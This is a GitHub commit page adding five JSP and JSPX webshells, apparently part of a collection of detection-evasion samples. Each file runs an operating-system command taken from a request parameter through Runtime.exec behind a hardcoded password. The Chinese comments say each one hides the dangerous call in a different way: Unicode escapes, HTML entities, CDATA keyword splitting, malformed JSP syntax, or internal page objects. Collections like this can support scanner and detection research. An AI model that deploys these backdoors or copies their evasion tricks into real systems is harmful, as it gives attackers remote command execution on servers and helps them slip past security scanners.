Skip to content

Commit

Permalink
add webshell 24-28
Browse files Browse the repository at this point in the history
  • Loading branch information
@fa1c0n1
fa1c0n1 committed Sep 20, 2020
1 parent d1db7d2 commit 9f0582a
Show file tree
Hide file tree
Showing 5 changed files with 99 additions and 0 deletions.
17 changes: 17 additions & 0 deletions web/webshell24.jsp
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
<%@ page import="java.io.InputStream" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>

<%--经过Unicode编码的webshell--%>
<%
\u0069\u0066\u0020\u0028"shaqima"\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028"ladypwd"\u0029\u0029\u0029\u0020\u007b
\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0020\u0069\u006e\u0020\u003d\u0020\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028"infocmd"\u0029\u002e\u0073\u0070\u006c\u0069\u0074\u0028" "\u0029\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u003b
\u0069\u006e\u0074\u0020\u0072\u0065\u0074\u0020\u003d\u0020\u002d\u0031\u003b
\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0062\u0073\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0062\u0079\u0074\u0065\u005b\u0032\u0030\u0034\u0038\u005d\u003b
\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u0028"<pre>"\u0029\u003b
\u0077\u0068\u0069\u006c\u0065\u0028\u0028\u0072\u0065\u0074\u0020\u003d\u0020\u0069\u006e\u002e\u0072\u0065\u0061\u0064\u0028\u0062\u0073\u0029\u0029\u0020\u0021\u003d\u0020\u002d\u0031\u0029\u0020\u007b
\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u006c\u006e\u0028\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0062\u0073\u0029\u0029\u003b
\u007d
\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u0028"</pre>"\u0029\u003b
\u007d
%>

18 changes: 18 additions & 0 deletions web/webshell25.jspx
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
<?xml version="1.0" encoding="UTF-8"?>
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml" version="2.0">
<!--对危险函数进行HTML实体编码的webshell-->
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8"/>
<jsp:directive.page import="java.io.InputStream"/>
<pre>
<jsp:scriptlet>
if ("shaqima".equals(request.getParameter("ladypwd"))) {
&#x49;&#x6e;&#x70;&#x75;&#x74;&#x53;&#x74;&#x72;&#x65;&#x61;&#x6d;&#x20;&#x69;&#x6e;&#x20;&#x3d;&#x20;&#x52;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x67;&#x65;&#x74;&#x52;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x28;&#x29;&#x2e;&#x65;&#x78;&#x65;&#x63;&#x28;&#x72;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x2e;&#x67;&#x65;&#x74;&#x50;&#x61;&#x72;&#x61;&#x6d;&#x65;&#x74;&#x65;&#x72;&#x28;&#x22;&#x63;&#x6d;&#x64;&#x22;&#x29;&#x2e;&#x73;&#x70;&#x6c;&#x69;&#x74;&#x28;&#x22;&#x20;&#x22;&#x29;&#x29;&#x2e;&#x67;&#x65;&#x74;&#x49;&#x6e;&#x70;&#x75;&#x74;&#x53;&#x74;&#x72;&#x65;&#x61;&#x6d;&#x28;&#x29;&#x3b;
int ret = -1;
byte[] bs = new byte[2048];
while((ret = in.read(bs)) != -1) {
out.println(new String(bs));
}
}
</jsp:scriptlet>
</pre>
</jsp:root>
18 changes: 18 additions & 0 deletions web/webshell26.jspx
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
<?xml version="1.0" encoding="UTF-8"?>
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml" version="2.0">
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8"/>
<jsp:directive.page import="java.io.InputStream"/>
<!--使用![CDATA[ ]]> 对危险函数关键字拆分的webshell-->
<pre>
<jsp:scriptlet>
if ("shaqima".equals(request.getParameter("ladypwd"))) {
InputStream in = Run<![CDATA[time.get]]>Run<![CDATA[time]]>().ex<![CDATA[ec(request.get]]>Parameter("cmd").split(" ")).getInputStream();
int ret = -1;
byte[] bs = new byte[2048];
while((ret = in.read(bs)) != -1) {
out.println(new String(bs));
}
}
</jsp:scriptlet>
</pre>
</jsp:root>
29 changes: 29 additions & 0 deletions web/webshell27.jsp
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
<%@ page import="java.io.InputStream" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%--利用不规则的JSP语法实现的webshell--%>
<%
String ladypwd = request.getParameter("ladypwd");
String cmd = request.getParameter("cmd");
setmode(out, ladypwd, cmd);
}catch(Throwable t) {} finally {_jspxFactory.releasePageContext(_jspx_page_context);}
}
public void setmode(JspWriter myout, String ladypwd, String cmd) throws Exception {
javax.servlet.jsp.JspWriter out = null;
javax.servlet.jsp.JspWriter _jspx_out = null;
javax.servlet.jsp.PageContext _jspx_page_context = null;
javax.servlet.http.HttpServletResponse response = null;
try {
if ("shaqima".equals(ladypwd)) {
InputStream in = Runtime.getRuntime().exec(cmd.split(" ")).getInputStream();
int ret = -1;
byte[] bs = new byte[2048];
myout.print("<pre>");
while((ret = in.read(bs)) != -1) {
myout.println(new String(bs));
}
myout.print("</pre>");
}
%>

17 changes: 17 additions & 0 deletions web/webshell28.jsp
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
<%@ page import="java.io.InputStream" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%--使用一些特殊的JSP内置对象实现的webshell--%>
<%
if ("shaqima".equals(_jspx_page_context.getRequest().getParameter("ladypwd"))) {
InputStream in = Runtime.getRuntime().exec(_jspx_page_context.getRequest().getParameter("cmd").split(" ")).getInputStream();
int ret = -1;
byte[] bs = new byte[2048];
out.print("<pre>");
while((ret = in.read(bs)) != -1) {
out.println(new String(bs));
}
out.print("</pre>");
}
%>


0 comments on commit 9f0582a

Please sign in to comment.